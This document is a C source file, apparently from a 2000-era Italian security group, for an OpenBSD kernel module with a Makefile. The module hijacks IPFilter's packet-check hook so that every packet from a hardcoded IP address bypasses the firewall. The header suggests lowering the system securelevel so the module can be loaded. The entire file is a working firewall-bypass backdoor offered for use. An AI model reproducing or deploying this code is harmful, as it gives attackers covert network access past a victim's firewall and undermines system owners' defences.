/* * Name: Filtering IpFilter ( OpenBSD Version + Makefile in append ) * Date: May 23 04:06:37 2000 * Author: pIGpEN [ pigpen@s0ftpj.org, deadhead@sikurezza.org ] * * SoftProject Digital Security for Y2K * Sikurezza.org Italian Security Mailing List * * COFFEE-WARE LICENSE - This source code is like "THE BEER-WARE LICENSE" by * Poul-Henning Kamp but you can give me in return a coffee. * * Tested on: OpenBSD 2.6 kern#0 i386 * * read ipfhack.c ( FreeBSD Version ) for information on how this works * * Note if you want to use this probably you have to modify securelevel... * (/etc/rc.securelevel) in order to load it in memory... * * Greetings to: Grace Slick - I love you ! :* * Bob Dylan - Tomorrow is your birthday ... yeah! * and for his tour in Italy :) * */ #define GO_JOHNNY_GO "192.168.1.3" /* packets sent by this ip will pass ! */ #include #include #include #include #include #include #include #include #include #include #include #include #include #include typedef struct ip ip_t; typedef struct mbuf mb_t; typedef int ipfr_t __P((ip_t *, int, void *, int, mb_t **)); static ipfr_t myfr, *fr; extern ipfr_t *fr_checkp; static u_int32_t inaton __P((const char *)); static int myfr(ip_t *ip, int hlen, void *ifp, int out, mb_t **mp) { if(ip->ip_src.s_addr == inaton(GO_JOHNNY_GO)) return 0; return(fr(ip, hlen, ifp, out, mp)); } MOD_MISC("IpFil"); static int IpFil_load(struct lkm_table *lkmtp, int cmd) { if(cmd == LKM_E_LOAD) { int s = splnet(); printf("Filtering iPFilter\n"); printf("(c) Coffeeware - SoftProject Y2k\n"); printf("pIGpEN / s0ftpj\n"); fr = fr_checkp; fr_checkp = myfr; splx(s); } return 0; } static int IpFil_unload(struct lkm_table *lkmtp, int cmd) { if(cmd == LKM_E_UNLOAD) { int s = splnet(); printf("iPFilter unloaded\n"); fr_checkp = fr; splx(s); } return 0; } IpFil( lkmtp, cmd, ver) struct lkm_table *lkmtp; int cmd; int ver; { DISPATCH(lkmtp, cmd, ver, IpFil_load, IpFil_unload, lkm_nofunc); } static u_int32_t inaton(const char *str) { unsigned long l; unsigned int val; int i; l = 0; for(i=0; i < 4; i++) { l <<= 8; if(*str != '\0') { val = 0; while(*str != '\0' && *str != '.') { val *= 10; val += *str - '0'; str++; } l |= val; if(*str != '\0') str++; } } return(htonl(l)); } /* SRCS=obsd_ipfhack.c OBJS=$(SRCS:.c=.o) MODOBJ=IpFil.o KMOD=IpFil CFLAGS+= -D_KERNEL -I/sys all: $(MODOBJ) clean: rm -f $(OBJS) $(KOBJS) $(MODOBJ) $(KMOD) load: modload -o $(KMOD) -e$(KMOD) $(MODOBJ) unload: modunload -n $(KMOD) $(MODOBJ): $(OBJS) $(KOBJS) $(LD) -r -o $(MODOBJ) $(OBJS) $(KOBJS) */